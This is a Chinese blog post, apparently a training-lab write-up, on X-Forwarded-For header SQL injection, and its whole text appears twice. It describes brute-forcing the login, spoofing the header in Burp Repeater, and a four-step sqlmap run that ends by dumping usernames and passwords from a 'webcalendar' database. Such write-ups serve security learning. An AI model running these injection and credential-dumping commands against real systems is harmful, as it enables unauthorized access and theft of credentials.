墨者学院:X-Forward-For注入漏洞实战
墨者学院:X-Forward-For注入漏洞实战
XFF注入是一种利用X-Forwarded-For(XFF)HTTP 头字段进行攻击的手段,攻击者通过篡改该字段来伪造自己的源IP地址,从而绕过基于IP的访问控制、日志记录和用户定位等安全机制,达到隐藏真实身份或伪装成合法用户的目的。
第一种解决方法
针对于这种漏洞,一般直接爆破就可以了,我们爆破出了username,接下来就是password
但进程会十分缓慢
第二种解决方法
X - Forwarded - For(XFF)是一个HTTP请求头字段,直接将X - Forwarded - For附加到Post包中,在后面附加IP为10.10.10.10,用Repeat模块重新发送
结合题目构造一下XFF,发现记录IP会变成XFF指定的IP,猜测有XFF注入
打开Sqlmap
第一步,爆破POST请求文件的数据库表名
Sqlmap.py -r “文件路径” --dbs --batch
第二步,爆破数据库中的表
Sqlmap.py -r “文件路径” -D webcalendar --tables --batch
第三步,获取表中字段
Sqlmap.py -r “文件路径” -D webcalendar -T user --columns --batch
第四步,获取关键信息
Sqlmap.py -r “文件路径” -D webcalendar -T user -C password, username --dump --batch
————————————————
版权声明:本文为CSDN博主「Molli_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:
https://blog.csdn.net/weixin_51724715/article/details/143275115
XFF注入是一种利用X-Forwarded-For(XFF)HTTP 头字段进行攻击的手段,攻击者通过篡改该字段来伪造自己的源IP地址,从而绕过基于IP的访问控制、日志记录和用户定位等安全机制,达到隐藏真实身份或伪装成合法用户的目的。
第一种解决方法
针对于这种漏洞,一般直接爆破就可以了,我们爆破出了username,接下来就是password
但进程会十分缓慢
第二种解决方法
X - Forwarded - For(XFF)是一个HTTP请求头字段,直接将X - Forwarded - For附加到Post包中,在后面附加IP为10.10.10.10,用Repeat模块重新发送
结合题目构造一下XFF,发现记录IP会变成XFF指定的IP,猜测有XFF注入
打开Sqlmap
第一步,爆破POST请求文件的数据库表名
Sqlmap.py -r “文件路径” --dbs --batch
第二步,爆破数据库中的表
Sqlmap.py -r “文件路径” -D webcalendar --tables --batch
第三步,获取表中字段
Sqlmap.py -r “文件路径” -D webcalendar -T user --columns --batch
第四步,获取关键信息
Sqlmap.py -r “文件路径” -D webcalendar -T user -C password, username --dump --batch
————————————————
版权声明:本文为CSDN博主「Molli_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:
https://blog.csdn.net/weixin_51724715/article/details/143275115